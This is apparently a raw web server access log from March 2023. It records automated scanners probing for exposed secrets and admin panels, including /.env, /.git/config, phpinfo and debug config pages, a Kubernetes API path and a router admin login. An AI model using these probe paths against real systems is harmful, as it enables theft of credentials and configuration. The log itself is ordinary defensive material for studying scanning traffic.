109.206.243.235 - - [27/Mar/2023:11:32:16 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
109.206.243.235 - - [27/Mar/2023:11:32:17 +0000] "POST / HTTP/1.1" 405 409778 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
109.206.243.235 - - [27/Mar/2023:11:32:18 +0000] "GET /_profiler/phpinfo HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
109.206.243.235 - - [27/Mar/2023:11:32:18 +0000] "GET /debug/default/view?panel=config HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
109.206.243.235 - - [27/Mar/2023:11:32:19 +0000] "GET /config.json HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
109.206.243.235 - - [27/Mar/2023:11:32:19 +0000] "GET /.git/config HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
135.125.246.110 - - [27/Mar/2023:11:36:08 +0000] "POST / HTTP/1.1" 405 409716 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [27/Mar/2023:11:44:26 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [27/Mar/2023:11:44:27 +0000] "POST / HTTP/1.1" 405 409718 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [27/Mar/2023:11:58:17 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.32.162.159 - - [27/Mar/2023:12:03:22 +0000] "GET / HTTP/1.1" 200 8384 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.128.232.149 - - [27/Mar/2023:12:34:41 +0000] "POST /boaform/admin/formLogin HTTP/1.1" 405 423582 "http://13.244.159.169:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
66.115.189.137 - - [27/Mar/2023:12:39:33 +0000] "GET /apis/apps/v1/namespaces/kube-system/daemonsets HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15"
198.27.84.160 - - [27/Mar/2023:12:44:47 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
198.27.84.160 - - [27/Mar/2023:12:44:47 +0000] "POST / HTTP/1.1" 405 409712 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
13.59.21.246 - - [27/Mar/2023:13:15:48 +0000] "GET / HTTP/1.1" 200 8387 "-" "python-requests/2.25.1"
43.154.128.189 - - [27/Mar/2023:13:16:45 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.118.53.194 - - [27/Mar/2023:13:20:01 +0000] "GET / HTTP/1.1" 200 8381 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
172.105.77.209 - - [27/Mar/2023:13:27:51 +0000] "-" 408 - "-" "-"
135.125.246.110 - - [27/Mar/2023:13:27:53 +0000] "POST / HTTP/1.1" 405 409738 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
